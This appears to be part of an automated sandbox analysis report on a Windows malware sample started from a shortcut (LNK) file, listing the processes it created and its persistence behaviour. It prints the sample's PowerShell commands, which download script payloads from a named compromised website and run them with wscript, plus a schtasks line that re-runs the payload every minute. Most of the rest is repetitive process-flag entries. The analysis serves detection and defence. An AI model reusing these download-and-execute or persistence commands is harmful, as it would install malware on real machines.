      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B872314 pushad ; iretd 4_2_00007FFD9B87232D

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Tries to download and execute files (via powershell)
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
